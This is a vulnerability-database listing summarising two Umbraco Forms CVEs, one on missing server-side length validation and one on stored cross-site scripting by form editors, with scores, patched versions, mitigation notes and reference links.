CVSS: 5.8EPSS: 0%CPEs: 4EXPL: 0CVE-2025-23041 – Short and Long Answer Fields Are Not Validated Server-Side For Maximum Length in Umbraco.Forms
https://notcve.org/view.php?id=CVE-2025-23041
14 Jan 2025 — Umbraco.Forms is a web form framework written for the nuget ecosystem. Character limits configured by editors for short and long answer fields are validated only client-side, not server-side. This issue has been patched in versions 8.13.16, 10.5.7, 13.2.2, and 14.1.2. Users are advised to upgrade. There are no known workarounds for this issue. • https://github.com/umbraco/Umbraco.Forms.Issues/security/advisories/GHSA-9v8m-qv22-f268 • CWE-20: Improper Input Validation •
CVSS: 3.3EPSS: 0%CPEs: 4EXPL: 0CVE-2024-35239 – Stored Cross-site Scripting on Components of Umbraco Forms
https://notcve.org/view.php?id=CVE-2024-35239
28 May 2024 — Umbraco Commerce is an open source dotnet web forms solution. In affected versions an authenticated user that has access to edit Forms may inject unsafe code into Forms components. This issue can be mitigated by configuring TitleAndDescription:AllowUnsafeHtmlRendering after upgrading to one of the patched versions (13.0.1, 12.2.2, 10.5.3, 8.13.13). Umbraco Commerce es una solución de formularios web dotnet de código abierto. En las versiones afectadas, un usuario autenticado que tiene acceso para editar for... • https://docs.umbraco.com/umbraco-forms/developer/configuration#editing-configuration-values • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •